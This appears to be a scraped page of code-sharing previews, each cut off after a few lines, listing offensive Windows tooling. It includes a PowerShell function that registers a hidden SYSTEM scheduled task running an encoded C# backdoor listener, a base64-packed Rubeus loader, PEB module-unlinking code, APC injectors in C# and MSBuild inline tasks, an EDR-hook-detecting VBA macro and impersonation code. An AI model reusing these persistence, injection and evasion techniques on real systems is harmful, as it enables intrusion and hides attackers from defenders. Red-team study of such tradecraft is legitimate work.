This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $confirmpreference = "none" | |
| function Get-ScheduledTaskSystem | |
| { | |
| $Name = -join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}) | |
| $SystemUser = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount | |
| $action = New-ScheduledTaskAction -Execute "powershell" -Argument " -noni -noP -sta -enc JABlAGEAcwB5AGIAaQBuAGQAIAA9ACAAQAAiAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0ADsACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBUAGgAcgBlAGEAZABpAG4AZwA7AAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBJAE8AOwAKAG4AYQBtAGUAcwBwAGEAYwBlACAAQgBhAGMAawBkAG8AbwByAFMAZQByAHYAZQByAAoAewAKACAAIAAgACAAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABCAGEAYwBrAGQAbwBvAHIACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAcAByAGkAdgBhAHQAZQAgAFQAYwBwAEwAaQBzAHQAZQBuAGUAcgAgAGwAaQBzAHQAZQBuAGUAcgA7AAoAIAAgACAAIAAgACAAIAAgAHAAcgBpAHYAYQB0AGUAIABTAG8AYwBrAGUAdAAgAG0AYQBpAG |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## uploaded by @satya_enki | |
| olevba3 0.53.1 - http://decalage.info/python/oletools | |
| Flags Filename | |
| ----------- ----------------------------------------------------------------- | |
| OLE:MASIHB-- 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29 | |
| =============================================================================== | |
| FILE: 285e6f550560f0ce01bcf0a1a47350075cca366f9e4bf9b573fd5b03c5644b29 | |
| Type: OLE | |
| ------------------------------------------------------------------------------- |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import requests | |
| import json | |
| import time | |
| import paramiko | |
| from Crypto.PublicKey import RSA | |
| from os import chmod | |
| public_key_name = "test1.key" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Rubeus { | |
| $EncodedCompressedFile = 'H4sIAAAAAAAEAOy9CZgcVbU4Xl1VXVsvM7drprpnyfRkmUnR3TNZJsAkLEmAsO8EmIQlYSchpLEaEBkmAipuIRBExQFFwiKLCipu6FNccMeHiruM6FPcnst7Ls8Fk/85595bS0/PJPr0/d/v+16+TNetc8+9dZdzzj3n3O2E9bcqmqIoOvzt2aMoH1L4v1XK3v9dD3/58hN55XH76bkfSh3/9Ny1l25q9F8R1C8Jzru8/4Lztm6tX9l//kX9wVVb+zdt7T/ipNP6L69feNFwLucsEHmcvEZRjk9pSvqG0XNlvs8r85RMarGiDEPJLA6bOh7C/RDYqPHSYVjl5VaU6Km8XSM4/tOUVa9SlHb6Hz3DB/3bDvmepPB870q3qqSmZPehLab96w+LTv8seD869j585UXXXInlHhL1Go7KHcti43DQCC6AMJUN627Ac7GWwFsF/4eDi7bUATErykx5HTAN77DmYj55PMfBsqlKWnnnoSnl+ZyqpOD9X1P0tb/pX586Dkn1yjxVm6AAAFQJUAVAkwAKnK82PKjXgNboUhSn7kLYh6YzKg+rfjdAVM2HYhhqowdefB2DWr0AD8L3VURVeharylL4PnyTafVOiHCqroFoTkb1AWqY9V54MeoMfod+POUYNcOoAyk431MrkK4d628q5UHFwXq40MZbRJ20oUwAOVzRmAPY1/Lc8KcK8DaElyN4HTrN0XZsGvaDYyAqBtx+InwFYujpzwWITIe9qtXnYVUrPYvTyqkp6j7WeEJVDKcxH+tgqH4O0Cb+DVrM8GLZ+guwVruNjwBuY0A0SHXbC4A3MFQc3PZjCOw2nsTYhRA7cD3G4CerwTNQQH8/AE78CGAeLwg2cHVI86pF/g5ZfxQTVzBrIMKqX8MPjmMS0RTQO1U3zdL+MMRkrfoiREWsXJjFv2AWixFuYhYWfv4b8PnykF1c11iKESPw4+om0+vLI |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include "HideModule.h" | |
| std::vector<UNLINKED_MODULE> UnlinkedModules; | |
| void RelinkModuleToPEB(HMODULE hModule) | |
| { | |
| std::vector<UNLINKED_MODULE>::iterator it = std::find_if(UnlinkedModules.begin(), UnlinkedModules.end(), FindModuleHandle(hModule)); | |
| if (it == UnlinkedModules.end()) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #coding: utf-8 | |
| # F-Isolation v0.1 - F**k isolated enviroments | |
| # Because we hate that kind of pentests where you start at an isolated citrix where our | |
| # clipboard is useless, we do not have internet access inside the machine and we can not | |
| # map a local resource to upload our tools. | |
| # OCR + Keyboard emulation FTW! |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.ComponentModel; | |
| using System.Runtime.InteropServices; | |
| using System.Security; | |
| using System.Security.Permissions; | |
| using System.Security.Principal; | |
| namespace ImpersonationTesting | |
| { | |
| public class Impersonate : IDisposable |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <-- x86 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <!- x64 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |